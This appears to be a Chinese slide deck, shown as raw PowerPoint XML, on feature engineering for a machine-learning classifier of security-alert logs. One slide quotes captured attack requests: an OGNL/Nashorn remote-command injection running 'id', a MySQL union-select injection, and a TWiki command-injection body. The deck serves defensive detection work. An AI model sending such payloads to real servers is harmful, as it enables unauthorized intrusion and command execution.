                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6278" y="4050"/>
              <a:ext cx="6491" cy="303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40000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400" spc="200">
                  <a:uFillTx/>
                  <a:latin typeface="微软雅黑" charset="-122"/>
                  <a:ea typeface="微软雅黑" charset="-122"/>
                  <a:cs typeface="微软雅黑" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>事件类型 ['注入型攻击' '挖矿样本' '扫描探测' 'web漏洞攻击' '通用网络攻击' '目录遍历攻击' '远程登录' '蠕虫病毒' '拒绝服务攻击'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" spc="200">
                  <a:uFillTx/>
                  <a:latin typeface="微软雅黑" charset="-122"/>
                  <a:ea typeface="微软雅黑" charset="-122"/>
                  <a:cs typeface="微软雅黑" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1400" spc="200">
                  <a:uFillTx/>
                  <a:latin typeface="微软雅黑" charset="-122"/>
                  <a:ea typeface="微软雅黑" charset="-122"/>
                  <a:cs typeface="微软雅黑" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>'木马' '恶意后门' '账号弱口令' '主机漏洞攻击' '文件上传攻击' 'webshell攻击' '远程文件包含攻击' '勒索软件'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" spc="200">
                  <a:uFillTx/>
                  <a:latin typeface="微软雅黑" charset="-122"/>
                  <a:ea typeface="微软雅黑" charset="-122"/>
                  <a:cs typeface="微软雅黑" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1400" spc="200">
                  <a:uFillTx/>
                  <a:latin typeface="微软雅黑" charset="-122"/>
                  <a:ea typeface="微软雅黑" charset="-122"/>
                  <a:cs typeface="微软雅黑" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>'数据泄露' '远程代码命令执行' '缓冲区溢出攻击' '身份认证绕过' '反序列化攻击' '权限提升' '跨站脚本攻击' '未授权访问攻击'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" spc="200">
                  <a:uFillTx/>
                  <a:latin typeface="微软雅黑" charset="-122"/>
                  <a:ea typeface="微软雅黑" charset="-122"/>
                  <a:cs typeface="微软雅黑" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1400" spc="200">
                  <a:uFillTx/>
                  <a:latin typeface="微软雅黑" charset="-122"/>
                  <a:ea typeface="微软雅黑" charset="-122"/>
                  <a:cs typeface="微软雅黑" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>'账号暴力破解' '僵尸网络']</a:t>
              </a:r>
              <a:endParaRPr sz="1400" spc="200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" charset="-122"/>
                <a:ea typeface="微软雅黑" charset="-122"/>
                <a:cs typeface="微软雅黑" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400" spc="200">
                  <a:uFillTx/>
                  <a:latin typeface="微软雅黑" charset="-122"/>
                  <a:ea typeface="微软雅黑" charset="-122"/>
                  <a:cs typeface="微软雅黑" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>攻击结果 ['企图' '成功' '失败']</a:t>
              </a:r>
              <a:endParaRPr sz="1400" spc="200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" charset="-122"/>
                <a:ea typeface="微软雅黑" charset="-122"/>
                <a:cs typeface="微软雅黑" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400" spc="200">
                  <a:uFillTx/>
                  <a:latin typeface="微软雅黑" charset="-122"/>
                  <a:ea typeface="微软雅黑" charset="-122"/>
                  <a:cs typeface="微软雅黑" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>威胁等级 ['较大' '一般' '轻微' '重大']</a:t>
              </a:r>
              <a:endParaRPr sz="1400" spc="200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" charset="-122"/>
                <a:ea typeface="微软雅黑" charset="-122"/>
                <a:cs typeface="微软雅黑" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400" spc="200">
                  <a:uFillTx/>
                  <a:latin typeface="微软雅黑" charset="-122"/>
                  <a:ea typeface="微软雅黑" charset="-122"/>
                  <a:cs typeface="微软雅黑" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>设备动作 ['允许' '--' '阻断']</a:t>
              </a:r>
              <a:endParaRPr sz="1400" spc="200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" charset="-122"/>
                <a:ea typeface="微软雅黑" charset="-122"/>
                <a:cs typeface="微软雅黑" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr sz="1400" spc="200">
                  <a:uFillTx/>
                  <a:latin typeface="微软雅黑" charset="-122"/>
                  <a:ea typeface="微软雅黑" charset="-122"/>
                  <a:cs typeface="微软雅黑" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>研判 ['非攻击' '无法研判' '攻击']</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" spc="200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑" charset="-122"/>
                <a:ea typeface="微软雅黑" charset="-122"/>
                <a:cs typeface="微软雅黑" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5895340" y="1678305"/>
            <a:ext cx="2692400" cy="440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4674235"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特征工程（数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>预处理）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1165860" y="1569720"/>
            <a:ext cx="10022205" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>根据数据特征的类型:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>，事件名称，事件类型，攻击结果，响应码，设备来源，规则ID，响应码，设备动作，研判 为离散格式，考虑先编码为整数格式(后采用独热编码)。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>，威胁等级取值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>有轻微，一般，较大，重大，为连续整数，考虑分别赋值为 0, 1, 2, 3；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1320165" y="3507740"/>
            <a:ext cx="5435600" cy="283210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043680" y="5255895"/>
            <a:ext cx="5346700" cy="482600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5991225" y="3507740"/>
            <a:ext cx="6760845" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>，去掉生成时间和结束时间；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>，删除重复的行；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 将响应体列中的空值替换为一个空字符串：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体"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7534275"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特征工程（数据预处理）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>观察特征</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>差异</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165860" y="1365250"/>
            <a:ext cx="4439285" cy="4732655"/>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5605145" y="1316355"/>
            <a:ext cx="4293870" cy="4876800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106170" y="4177030"/>
            <a:ext cx="8308975" cy="892810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent6">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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="350920" y="312819"/>
            <a:ext cx="11490158" cy="623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5866" y="781567"/>
            <a:ext cx="8759190" cy="58356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特征工程（数据预处理）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>解析攻击流量请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>体</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1183640" y="1574165"/>
            <a:ext cx="9667875" cy="4092575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>rst line =  GET /${Class.forName("com.opensymphony.webwork.ServletActionContext").getMethod("getResponse",null).invoke(null,null).setHeader("X-Cmd-Response",Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("nashorn").eval("var d='';var i = java.lang.Runtime.getRuntime().exec('id').getInputStream(); while(i.available())d+=String.fromCharCode(i.read());d"))}/ HTTP/1.1 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>headers =  Host: 112.13.167.100:8090 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>User-Agent: Mozilla/5.0 zgrab/0.x </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>Accept: */* </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>Accept-Encoding: gzip </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>body =  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>rst line =  GET /member/ajax_membergroup.php?action=post&amp;membergroup=@`'`/*!50000Union */ /*!50000select */ md5(910332797) -- @`'` HTTP/1.1 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>headers =  Host: 218.205.111.5:8098 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>Accept: */* </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>Accept-Encoding: gzip </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>body =  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>rst line =  POST /cgi-bin/twiki/bin/view HTTP/1.0</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>headers =  User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>Host: 223.92.5.30</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>Content-Length: 63</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>Content-Type: application/x-www-form-urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>Accept: */*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>Connection: close</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>body =  rev=1|ISOP#@!START|echo ISOP#@!ENDxHELLOxWORLDx||</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106170" y="5400675"/>
            <a:ext cx="4465320" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent6">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custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165860" y="1574165"/>
            <a:ext cx="9027160" cy="582930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent6">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custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116330" y="3162300"/>
            <a:ext cx="8759190" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent6">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54_4*l_h_i*1_1_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228054"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_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054_4*l_h_i*1_3_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20228054"/>
